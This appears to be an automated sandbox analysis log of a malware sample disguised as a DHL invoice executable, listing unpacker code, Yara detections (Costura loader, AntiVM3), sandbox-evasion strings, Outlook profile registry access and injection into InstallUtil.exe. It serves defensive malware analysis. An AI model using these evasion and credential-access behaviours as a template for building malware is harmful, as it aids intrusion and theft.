Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2049582466.0000000005290000.00000004.08000000.00040000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2049582466.0000000005290000.00000004.08000000.00040000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2050754854.0000000005F10000.00000004.08000000.00040000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2050754854.0000000005F10000.00000004.08000000.00040000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, Bqdluhjaql.cs	.Net Code: Nrdhcgaq System.AppDomain.Load(byte[])
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5290000.4.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5290000.4.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5290000.4.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5f10000.7.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5f10000.7.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5f10000.7.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5f10000.7.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5f10000.7.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.33cf790.3.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.33cf790.3.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.33cf790.3.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5e70000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2050649719.0000000005E70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2036269794.0000000002409000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Invoice DHL - AWB 2024 E4001 - 0000731.exe PID: 6672, type: MEMORYSTR

Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Code function: 0_2_05230828 push esp; ret	0_2_05230859
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Code function: 0_2_0523CB64 push cs; retf	0_2_0523CB75
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Code function: 0_2_05C102F1 push es; iretd	0_2_05C102F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05D9AC28 push eax; ret	4_2_05D9AC2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05D9ABF6 push eax; ret	4_2_05D9AC2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05D92E78 push esp; iretd	4_2_05D92E79

Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	File created: \invoice dhl - awb 2024 e4001 - 0000731.exe
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	File created: \invoice dhl - awb 2024 e4001 - 0000731.exe			Jump to behavior

Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: Invoice DHL - AWB 2024 E4001 - 0000731.exe PID: 6672, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2036269794.0000000002409000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Memory allocated: A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Memory allocated: 2380000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Memory allocated: 4380000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 9C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2410000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2350000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597686	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597342	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597107	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596996	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595638	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595297	Jump to behavior
